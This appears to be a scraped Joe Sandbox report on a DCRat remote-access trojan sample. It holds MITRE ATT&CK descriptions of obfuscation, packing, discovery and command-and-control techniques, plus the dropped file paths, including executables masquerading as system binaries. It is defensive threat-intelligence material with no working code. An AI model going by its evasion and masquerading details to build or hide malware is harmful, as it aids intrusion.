Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report QoRXFaE8Xn.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\PortcomAgentwinbroker\1uTBfrpLb993XlgcpIpPee79uOtZ.bat

C:\PortcomAgentwinbroker\Runtimemonitor.exe

C:\PortcomAgentwinbroker\w1FXjdRze6k4uvStmhH3M.vbe

C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\2afe4ed40d5a86

C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe

C:\Program Files (x86)\Windows NT\TableTextService\ca1d63bd2d464f

C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe

C:\Recovery\21b1a557fd31cc

C:\Recovery\dasHost.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Runtimemonitor.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dasHost.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ihpxTeRPVLYTpFZNVeq.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\smartscreen.exe.log

C:\Windows\appcompat\encapsulation\ca1d63bd2d464f

Windows Analysis Report
QoRXFaE8Xn.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre